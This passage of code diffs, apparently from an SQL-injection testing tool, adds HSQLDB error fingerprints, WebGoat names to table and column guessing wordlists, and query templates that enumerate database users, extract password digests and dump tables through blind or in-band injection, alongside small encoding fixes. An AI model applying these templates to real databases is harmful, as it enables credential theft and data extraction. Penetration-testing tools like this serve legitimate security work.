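    # Check the 4-byte BOMs before the 2-byte ones: BOM_UTF32_LE begins with BOM_LE.
    if data[:3] == codecs.BOM_UTF8:
        return "UTF-8-SIG"
    if data[:4] == codecs.BOM_UTF32_LE:
        return "UTF-32LE"
    if data[:4] == codecs.BOM_UTF32_BE:
        return "UTF-32BE"
    if data[:2] == codecs.BOM_LE:
        return "UTF-16LE"
    if data[:2] == codecs.BOM_BE:
        return "UTF-16BE"
    return None

print(sniff_bom(b"\xef\xbb\xbfhello"))   # -> UTF-8-SIG
print(sniff_bom(b"plain ascii"))         # -> None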

View File

@ -13,26 +13,26 @@
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
import constants, sys
from constants import eStart, eError, eItsMe
from charsetprober import CharSetProber
from codingstatemachine import CodingStateMachine
from mbcssm import UTF8SMModel
from . import constants
from .charsetprober import CharSetProber
from .codingstatemachine import CodingStateMachine
from .mbcssm import UTF8SMModel
ONE_CHAR_PROB = 0.5
class UTF8Prober(CharSetProber):
def __init__(self):
CharSetProber.__init__(self)
@ -50,13 +50,13 @@ class UTF8Prober(CharSetProber):
def feed(self, aBuf):
for c in aBuf:
codingState = self._mCodingSM.next_state(c)
if codingState == eError:
if codingState == constants.eError:
self._mState = constants.eNotMe
break
elif codingState == eItsMe:
elif codingState == constants.eItsMe:
self._mState = constants.eFoundIt
break
elif codingState == eStart:
elif codingState == constants.eStart:
if self._mCodingSM.get_current_charlen() >= 2:
self._mNumOfMBChar += 1

View File

@ -73,7 +73,7 @@ class MultipartPostHandler(urllib2.BaseHandler):
request.add_data(data)
return request
def multipart_encode(vars, files, boundary = None, buf = None):
def multipart_encode(vars, files, boundary=None, buf=None):
if boundary is None:
boundary = mimetools.choose_boundary()
@ -100,7 +100,7 @@ class MultipartPostHandler(urllib2.BaseHandler):
# buf += 'Content-Length: %s\r\n' % file_size
fd.seek(0)
buf = str(buf)
buf = str(buf) if not isinstance(buf, unicode) else buf.encode("utf8")
buf += '\r\n%s\r\n' % fd.read()
buf += '--%s--\r\n\r\n' % boundary
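The one-line change above keeps str() coercion for byte strings but encodes unicode buffers to UTF-8, avoiding a UnicodeEncodeError once non-ASCII form values reach the multipart body. The same normalisation, written as a standalone Python 3-style helper (illustrative only; the handler itself targets Python 2's urllib2):

def to_bytes(value, encoding="utf8"):
    """Coerce a text or arbitrary value to bytes, mirroring the fix above."""
    if isinstance(value, bytes):
        return value
    return str(value).encode(encoding)

print(to_bytes(u"\u00e9clair"))   # -> b'\xc3\xa9clair'
print(to_bytes(b"already"))       # -> b'already'
print(to_bytes(42))               # -> b'42'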

View File

@ -2596,3 +2596,7 @@ tmp_lahir
universitas
urut
waktu
# WebGoat
cookie
login_count

View File

@ -3366,3 +3366,6 @@ tuser
tusers
userstbl
usertbl
# WebGoat
user_data

View File

@ -104,6 +104,8 @@
<!-- HSQLDB -->
<dbms value="HSQLDB">
<error regexp="org\.hsqldb\.jdbc"/>
<error regexp="Unexpected end of command in statement \["/>
<error regexp="Unexpected token.*in statement \["/>
</dbms>
</root>
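The two added expressions let the error-based heuristics recognise HSQLDB from its parser messages. A quick check of how they match (the sample messages are hypothetical, merely shaped after HSQLDB's usual wording):

import re

patterns = (
    r"org\.hsqldb\.jdbc",
    r"Unexpected end of command in statement \[",
    r"Unexpected token.*in statement \[",
)

# Hypothetical error snippets for illustration.
samples = (
    "org.hsqldb.jdbc.JDBCUtil: error thrown by driver",
    "Unexpected end of command in statement [SELECT * FROM users WHERE id=1']",
    "Unexpected token: FOO in statement [SELECT FOO]",
)

for sample in samples:
    print(any(re.search(p, sample) for p in patterns), "-", sample[:40])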

View File

@ -651,8 +651,8 @@
<cast query="CAST(%s AS LONGVARCHAR)"/>
<length query="CHAR_LENGTH(%s)"/>
<isnull query="IFNULL(%s,' ')"/>
<delimiter query=","/>
<limit query="LIMIT %d %d"/>
<delimiter query="||"/>
<limit query="LIMIT %d %d" query2="LIMIT %d OFFSET %d"/>
<limitregexp query="\s+LIMIT\s+([\d]+)\s*\,\s*([\d]+)" query2="\s+LIMIT\s+([\d]+)"/>
<limitgroupstart query="1"/>
<limitgroupstop query="2"/>
@ -675,30 +675,30 @@
<check_udf/>
<users>
<!-- LIMIT is needed at start for v1.7 this gets mangled unless no-cast is used -->
<blind query="SELECT LIMIT %d 1 DISTINCT(user) FROM INFORMATION_SCHEMA.SYSTEM_USERS" count="SELECT COUNT(DISTINCT(user)) FROM INFORMATION_SCHEMA.SYSTEM_USERS"/>
<inband query="SELECT user FROM INFORMATION_SCHEMA.SYSTEM_USERS"/>
<blind query="SELECT LIMIT %d 1 DISTINCT(user) FROM INFORMATION_SCHEMA.SYSTEM_USERS ORDER BY user" count="SELECT COUNT(DISTINCT(user)) FROM INFORMATION_SCHEMA.SYSTEM_USERS"/>
<inband query="SELECT user FROM INFORMATION_SCHEMA.SYSTEM_USERS ORDER BY user"/>
</users>
<passwords>
<!-- Passwords only shown in later versions &gt;=2.0 -->
<blind query="SELECT LIMIT %d 1 DISTINCT(password_digest) FROM INFORMATION_SCHEMA.SYSTEM_USERS WHERE user_name='%s'" count="SELECT COUNT(DISTINCT(password_digest)) FROM INFORMATION_SCHEMA.SYSTEM_USERS WHERE user_name='%s'"/>
<inband query="SELECT user_name,password_digest FROM INFORMATION_SCHEMA.SYSTEM_USERS" condition="user_name"/>
<blind query="SELECT LIMIT %d 1 DISTINCT(password_digest) FROM INFORMATION_SCHEMA.SYSTEM_USERS WHERE user_name='%s' ORDER BY password_digest" count="SELECT COUNT(DISTINCT(password_digest)) FROM INFORMATION_SCHEMA.SYSTEM_USERS WHERE user_name='%s'"/>
<inband query="SELECT user_name,password_digest FROM INFORMATION_SCHEMA.SYSTEM_USERS ORDER BY user_name" condition="user_name"/>
</passwords>
<privileges/>
<roles/>
<dbs>
<blind query="SELECT LIMIT %d 1 DISTINCT(table_schem) FROM INFORMATION_SCHEMA.SYSTEM_SCHEMAS" count="SELECT COUNT(table_schem) FROM INFORMATION_SCHEMA.SYSTEM_SCHEMAS"/>
<inband query="SELECT table_schem FROM INFORMATION_SCHEMA.SYSTEM_SCHEMAS" />
<blind query="SELECT LIMIT %d 1 DISTINCT(table_schem) FROM INFORMATION_SCHEMA.SYSTEM_SCHEMAS ORDER BY table_schem" count="SELECT COUNT(table_schem) FROM INFORMATION_SCHEMA.SYSTEM_SCHEMAS"/>
<inband query="SELECT table_schem FROM INFORMATION_SCHEMA.SYSTEM_SCHEMAS ORDER BY table_schem" />
</dbs>
<tables>
<blind query="SELECT LIMIT %d 1 table_name FROM INFORMATION_SCHEMA.SYSTEM_TABLES WHERE table_schem='%s' " count="SELECT COUNT(table_name) FROM INFORMATION_SCHEMA.SYSTEM_TABLES WHERE table_schem='%s'"/>
<inband query="SELECT table_schem,table_name FROM INFORMATION_SCHEMA.SYSTEM_TABLES" condition="table_schem"/>
<blind query="SELECT LIMIT %d 1 table_name FROM INFORMATION_SCHEMA.SYSTEM_TABLES WHERE table_schem='%s' ORDER BY table_name" count="SELECT COUNT(table_name) FROM INFORMATION_SCHEMA.SYSTEM_TABLES WHERE table_schem='%s'"/>
<inband query="SELECT table_schem,table_name FROM INFORMATION_SCHEMA.SYSTEM_TABLES ORDER BY table_schem" condition="table_schem"/>
</tables>
<columns>
<blind query="SELECT column_name FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE table_name='%s' AND table_schem='%s'" query2="SELECT column_type FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND column_name='%s' AND table_schema='%s'" count="SELECT COUNT(column_name) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND table_schema='%s'" condition="column_name"/>
<inband query="SELECT column_name,type_name FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE table_name='%s' AND table_schem='%s'" condition="column_name"/>
<blind query="SELECT column_name FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE table_name='%s' AND table_schem='%s' ORDER BY column_name" query2="SELECT column_type FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE table_name='%s' AND column_name='%s' AND table_schem='%s'" count="SELECT COUNT(column_name) FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE table_name='%s' AND table_schem='%s'" condition="column_name"/>
<inband query="SELECT column_name,type_name FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE table_name='%s' AND table_schem='%s' ORDER BY column_name" condition="column_name"/>
</columns>
<dump_table>
<blind query="SELECT LIMIT %d 1 %s FROM %s.%s ORDER BY %s " count="SELECT COUNT(*) FROM %s.%s"/>
<blind query="SELECT %s FROM %s.%s ORDER BY %s LIMIT 1 OFFSET %d" count="SELECT COUNT(*) FROM %s.%s"/>
<inband query="SELECT %s FROM %s.%s ORDER BY %s"/>
</dump_table>
<search_db>